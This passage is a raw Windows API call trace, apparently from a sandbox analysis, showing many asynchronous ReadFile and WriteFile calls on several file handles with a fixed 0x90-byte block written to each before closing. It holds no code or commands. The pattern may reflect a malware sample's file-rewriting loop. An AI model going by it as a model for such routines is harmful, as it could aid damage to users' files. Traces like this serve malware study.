lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0156.644] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.644] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.644] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.644] WriteFile (in: hFile=0x1bc, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020) returned 1 [0156.666] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.666] CloseHandle (hObject=0x1bc) returned 1 [0156.674] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0156.676] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.676] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3510020) returned 0x0 [0156.676] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.676] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.676] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.677] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020) returned 1 [0156.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.681] CloseHandle (hObject=0x1f0) returned 1 [0156.685] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0156.688] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.987] ReadFile (in: hFile=0x1f0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2690020) returned 1 [0156.987] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.987] ReadFile (in: hFile=0x1bc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3480020) returned 1 [0156.987] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.987] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x35a0020) returned 1 [0156.988] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.988] ReadFile (in: hFile=0x1d8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x36c0020) returned 1 [0156.988] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.988] ReadFile (in: hFile=0x1c0, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x37e0020) returned 1 [0156.989] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.989] ReadFile (in: hFile=0x1ac, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3900020) returned 1 [0156.989] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.990] WriteFile (in: hFile=0x1f0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x223a, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020) returned 1 [0156.990] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.990] WriteFile (in: hFile=0x1bc, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x183d, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3480020) returned 1 [0156.990] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.990] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x11d21, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x35a0020) returned 1 [0156.991] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.991] WriteFile (in: hFile=0x1d8, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020) returned 1 [0156.991] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.992] WriteFile (in: hFile=0x1c0, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x14858, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37e0020) returned 1 [0156.992] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.992] WriteFile (in: hFile=0x1ac, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0xe216, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3900020) returned 1 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.993] ReadFile (in: hFile=0x1f0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2690020) returned 0x0 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.993] ReadFile (in: hFile=0x1bc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3480020) returned 0x0 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.993] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.993] ReadFile (in: hFile=0x1d8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.993] ReadFile (in: hFile=0x1c0, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0156.993] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.994] ReadFile (in: hFile=0x1ac, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3900020) returned 0x0 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.994] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.994] WriteFile (in: hFile=0x1f0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020) returned 1 [0156.994] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.994] WriteFile (in: hFile=0x1bc, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3480020) returned 1 [0156.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.995] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x35a0020) returned 1 [0156.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.995] WriteFile (in: hFile=0x1d8, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020) returned 1 [0156.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.995] WriteFile (in: hFile=0x1c0, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37e0020) returned 1 [0156.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.995] WriteFile (in: hFile=0x1ac, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3900020) returned 1 [0156.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.995] CloseHandle (hObject=0x1f0) returned 1 [0156.997] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0157.000] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.000] CloseHandle (hObject=0x1bc) returned 1 [0157.001] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0157.005] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.005] CloseHandle (hObject=0x1e0) returned 1 [0157.007] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0157.010] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.010] CloseHandle (hObject=0x1d8) returned 1 [0157.011] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0157.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.014] CloseHandle (hObject=0x1c0) returned 1 [0157.020] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0157.061] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.061] CloseHandle (hObject=0x1ac) returned 1 [0157.341] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0157.344] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.486] ReadFile (in: hFile=0x1ac, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 1 [0157.486] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.487] ReadFile (in: hFile=0x1a4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2b70020) returned 1 [0157.487] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.487] ReadFile (in: hFile=0x1bc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3510020) returned 1 [0157.487] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.487] WriteFile (in: hFile=0x1ac, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x6da9, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020) returned 1 [0157.524] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.525] ReadFile (in: hFile=0x1ac, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 0x0 [0157.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0157.525] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.525] WriteFile (in: hFile=0x1ac, lpBuffer=0x710094*, 